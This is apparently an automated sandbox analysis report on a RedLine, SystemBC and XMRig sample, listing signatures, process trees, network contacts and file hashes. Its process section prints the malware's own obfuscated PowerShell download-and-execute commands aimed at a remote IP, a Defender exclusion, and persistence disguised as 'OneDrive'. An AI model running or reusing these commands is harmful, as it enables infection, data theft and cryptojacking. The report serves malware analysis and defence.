Malware Analysis Report

2025-04-03 09:39

Sample ID 230506-22sdqagh7y
Target 0e4e3cdacfbe29fdc3e189e52ee8228e.exe
SHA256 ac3af6bd3139c444e8e146a6d48c110ae33c09d23c84b7b02f3d7af9eaa49c84
Tags: redline systembc xmrig infostealer miner persistence stealer trojan spyware
Score: 10/10

Analysis Overview

Threat Level: Known bad

The file 0e4e3cdacfbe29fdc3e189e52ee8228e.exe was found to be: Known bad.

Malicious Activity Summary

Suspicious use of NtCreateUserProcessOtherParentProcess

xmrig

RedLine

SystemBC

Detects Redline Stealer samples

XMRig Miner payload

Blocklisted process makes network request

Downloads MZ/PE file

Executes dropped EXE

Checks computer location settings

Loads dropped DLL

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Drops file in System32 directory

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Creates scheduled task(s)

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Checks processor information in registry

Suspicious behavior: LoadsDriver

Suspicious use of SendNotifyMessage

Delays execution with timeout.exe

Suspicious behavior: AddClipboardFormatListener

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2023-05-06 23:05

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2023-05-06 23:05

Reported: 2023-05-07 01:42

Platform: win7-20230220-en

Max time kernel: 151s

Max time network: 146s

Command Line

C:\Windows\Explorer.EXE

Signatures

Detects Redline Stealer samples

stealer

RedLine

infostealer redline

SystemBC

trojan systembc

xmrig

miner xmrig

XMRig Miner payload

miner

Downloads MZ/PE file

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\ProgramData\\lsass\\lsass.exe" C:\Users\Admin\AppData\Roaming\lsass.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1800 set thread context of 268 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe
PID 1800 set thread context of 1344 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A

Suspicious behavior: LoadsDriver

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\lsass.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\lsass\lsass.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\conhost.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\lsass.exe N/A
N/A N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2044 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2044 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2044 wrote to memory of 756 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2044 wrote to memory of 284 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 756 wrote to memory of 1344 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 756 wrote to memory of 1988 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 756 wrote to memory of 1580 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 1076 wrote to memory of 1464 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1076 wrote to memory of 1340 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1076 wrote to memory of 932 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1076 wrote to memory of 1240 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1528 wrote to memory of 1992 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 560 wrote to memory of 1800 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
PID 1512 wrote to memory of 284 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1512 wrote to memory of 2024 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1512 wrote to memory of 1348 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1512 wrote to memory of 1544 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1908 wrote to memory of 848 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 1580 wrote to memory of 1464 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 1580 wrote to memory of 1300 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe

"C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Users\Admin\AppData\Roaming\OneDrive.exe

"C:\Users\Admin\AppData\Roaming\OneDrive.exe"

C:\Users\Admin\AppData\Roaming\dllhost.exe

"C:\Users\Admin\AppData\Roaming\dllhost.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Users\Admin\AppData\Roaming\lsass.exe

"C:\Users\Admin\AppData\Roaming\lsass.exe"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "OneDrive"

C:\Windows\system32\taskeng.exe

taskeng.exe {8E351A0D-A54B-431F-A5A8-7417E4518E7B} S-1-5-21-3430344531-3702557399-3004411149-1000:WFSTZEPN\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'

C:\Windows\SysWOW64\schtasks.exe

"schtasks.exe" /create /tn OneDrive /tr "C:\ProgramData\lsass\lsass.exe" /st 03:45 /du 23:59 /sc daily /ri 1 /f

C:\ProgramData\lsass\lsass.exe

"C:\ProgramData\lsass\lsass.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp3E1A.tmp.bat""

C:\Windows\SysWOW64\timeout.exe

timeout 7

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

Network

Country Destination Domain Proto
RU 62.204.41.23:80 62.204.41.23 tcp
RU 62.204.41.23:80 62.204.41.23 tcp
RU 62.204.41.23:80 62.204.41.23 tcp
US 8.8.8.8:53 maper.info udp
DE 148.251.234.93:443 maper.info tcp
DE 148.251.234.93:443 maper.info tcp
US 8.8.8.8:53 pool.hashvault.pro udp
US 142.202.242.45:80 pool.hashvault.pro tcp

Files

memory/2044-54-0x0000000000940000-0x0000000000958000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 f1ab24301dbb9f3d71747a9648b246a8
SHA1 d66c552807c82193020d4946cd1183e2b0a470d1
SHA256 79f0da1bb888ac942d36aa29f0bfcb73f78a053e0352341f5e63e96ccecdac07
SHA512 1a904b7c266034590bb4b06efceb3020d1f9c77cbc6c1154c3fa57e43fdf365a9d8b4cbf734669453ad3274e7037ee362c0234111a3105db9cf567e33113ee3b

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 f1ab24301dbb9f3d71747a9648b246a8
SHA1 d66c552807c82193020d4946cd1183e2b0a470d1
SHA256 79f0da1bb888ac942d36aa29f0bfcb73f78a053e0352341f5e63e96ccecdac07
SHA512 1a904b7c266034590bb4b06efceb3020d1f9c77cbc6c1154c3fa57e43fdf365a9d8b4cbf734669453ad3274e7037ee362c0234111a3105db9cf567e33113ee3b

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IIGXFCBUXLXFNYYFBGXW.temp

MD5 f1ab24301dbb9f3d71747a9648b246a8
SHA1 d66c552807c82193020d4946cd1183e2b0a470d1
SHA256 79f0da1bb888ac942d36aa29f0bfcb73f78a053e0352341f5e63e96ccecdac07
SHA512 1a904b7c266034590bb4b06efceb3020d1f9c77cbc6c1154c3fa57e43fdf365a9d8b4cbf734669453ad3274e7037ee362c0234111a3105db9cf567e33113ee3b

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 f1ab24301dbb9f3d71747a9648b246a8
SHA1 d66c552807c82193020d4946cd1183e2b0a470d1
SHA256 79f0da1bb888ac942d36aa29f0bfcb73f78a053e0352341f5e63e96ccecdac07
SHA512 1a904b7c266034590bb4b06efceb3020d1f9c77cbc6c1154c3fa57e43fdf365a9d8b4cbf734669453ad3274e7037ee362c0234111a3105db9cf567e33113ee3b

memory/1992-74-0x00000000022C0000-0x0000000002340000-memory.dmp

memory/756-75-0x000000001B0C0000-0x000000001B3A2000-memory.dmp

memory/756-76-0x0000000002410000-0x0000000002418000-memory.dmp

memory/1992-78-0x00000000022CB000-0x0000000002302000-memory.dmp

memory/1992-77-0x00000000022C4000-0x00000000022C7000-memory.dmp

memory/284-79-0x00000000027E0000-0x0000000002860000-memory.dmp

memory/756-80-0x00000000025D0000-0x0000000002650000-memory.dmp

memory/1936-82-0x00000000024D0000-0x0000000002550000-memory.dmp

memory/284-81-0x00000000027E0000-0x0000000002860000-memory.dmp

memory/284-84-0x00000000027E0000-0x0000000002860000-memory.dmp

memory/756-83-0x00000000025D0000-0x0000000002650000-memory.dmp

memory/1936-85-0x0000000002750000-0x000000000275E000-memory.dmp

memory/284-86-0x0000000002970000-0x0000000002980000-memory.dmp

memory/756-87-0x00000000025D0000-0x0000000002650000-memory.dmp

memory/284-88-0x00000000027E0000-0x0000000002860000-memory.dmp

memory/284-89-0x00000000027E0000-0x0000000002860000-memory.dmp

memory/756-90-0x00000000025D0000-0x0000000002650000-memory.dmp

memory/284-91-0x00000000027E0000-0x0000000002860000-memory.dmp

\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 888bfc5a63177bdc5aaa1429eca8e632
SHA1 3eca9ed178f35a94524a17356a60702d8d5d2e69
SHA256 fc233bc51158c9250a005cab1d7e3b200722a675e392e799b11a5eef6503339c
SHA512 c95f454d559038393d55a7afc889e675ede6a8f5cdecf238f5b09ce8e0a88adc4c7e1d711c3c23469e086fe4e7beb6655b1810a5b085b137495c8db4890749ac

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 888bfc5a63177bdc5aaa1429eca8e632
SHA1 3eca9ed178f35a94524a17356a60702d8d5d2e69
SHA256 fc233bc51158c9250a005cab1d7e3b200722a675e392e799b11a5eef6503339c
SHA512 c95f454d559038393d55a7afc889e675ede6a8f5cdecf238f5b09ce8e0a88adc4c7e1d711c3c23469e086fe4e7beb6655b1810a5b085b137495c8db4890749ac

memory/1988-106-0x0000000000400000-0x000000000058B000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 f1ab24301dbb9f3d71747a9648b246a8
SHA1 d66c552807c82193020d4946cd1183e2b0a470d1
SHA256 79f0da1bb888ac942d36aa29f0bfcb73f78a053e0352341f5e63e96ccecdac07
SHA512 1a904b7c266034590bb4b06efceb3020d1f9c77cbc6c1154c3fa57e43fdf365a9d8b4cbf734669453ad3274e7037ee362c0234111a3105db9cf567e33113ee3b

memory/1344-108-0x000000013F660000-0x000000014002A000-memory.dmp

C:\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

memory/1580-117-0x0000000000FE0000-0x0000000001400000-memory.dmp

memory/1988-119-0x0000000000400000-0x000000000058B000-memory.dmp

memory/1528-121-0x0000000002680000-0x0000000002700000-memory.dmp

memory/1580-120-0x0000000000FE0000-0x0000000001400000-memory.dmp

memory/1528-123-0x0000000002680000-0x0000000002700000-memory.dmp

\??\c:\users\admin\appdata\roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

memory/1528-125-0x0000000002680000-0x0000000002700000-memory.dmp

memory/1528-126-0x0000000002680000-0x0000000002700000-memory.dmp

memory/1580-127-0x0000000000FE0000-0x0000000001400000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/1344-130-0x000000013F660000-0x000000014002A000-memory.dmp

memory/1580-131-0x0000000002D90000-0x0000000002DD0000-memory.dmp

\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 f1ab24301dbb9f3d71747a9648b246a8
SHA1 d66c552807c82193020d4946cd1183e2b0a470d1
SHA256 79f0da1bb888ac942d36aa29f0bfcb73f78a053e0352341f5e63e96ccecdac07
SHA512 1a904b7c266034590bb4b06efceb3020d1f9c77cbc6c1154c3fa57e43fdf365a9d8b4cbf734669453ad3274e7037ee362c0234111a3105db9cf567e33113ee3b

memory/1908-140-0x000000001B020000-0x000000001B302000-memory.dmp

memory/1908-141-0x0000000002250000-0x0000000002258000-memory.dmp

memory/1908-142-0x00000000026C0000-0x0000000002740000-memory.dmp

memory/1908-143-0x00000000026C0000-0x0000000002740000-memory.dmp

memory/1908-144-0x00000000026C0000-0x0000000002740000-memory.dmp

C:\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

memory/1908-146-0x00000000026CB000-0x0000000002702000-memory.dmp

\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

\??\c:\programdata\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\Users\Admin\AppData\Local\Temp\tmp3E1A.tmp.bat

MD5 db65c6d1bce7ecac88b67279788f4ac7
SHA1 99dbfe59b863c5f230cb67eab50f1861be5c3097
SHA256 0323f30b65ade053ef369dbb44fe50c204c794c99d77fe30069696062e4778a8
SHA512 f2254375ba896e498460bc7a96a9ab4daf95e0ca9a43239a599625bff22fc5c447d4186d43ce5628d39581c1a8ea1f8c74b3819ef0d1816999e19ab4f0e5e785

memory/1580-153-0x0000000000FE0000-0x0000000001400000-memory.dmp

memory/1300-161-0x0000000000A10000-0x0000000000E30000-memory.dmp

memory/1580-163-0x0000000006FD0000-0x00000000073F0000-memory.dmp

memory/1300-162-0x0000000000A10000-0x0000000000E30000-memory.dmp

memory/1300-164-0x0000000000A10000-0x0000000000E30000-memory.dmp

memory/1580-165-0x0000000000FE0000-0x0000000001400000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

Analysis: behavioral2

Detonation Overview

Submitted

2023-05-06 23:05

Reported

2023-05-07 01:42

Platform

win10v2004-20230220-en

Max time kernel

152s

Max time network

166s

Command Line

C:\Windows\Explorer.EXE

Signatures

Detects Redline Stealer samples

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

SystemBC

trojan systembc

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\lsass.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\ProgramData\\lsass\\lsass.exe" C:\Users\Admin\AppData\Roaming\lsass.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious behavior: EnumeratesProcesses

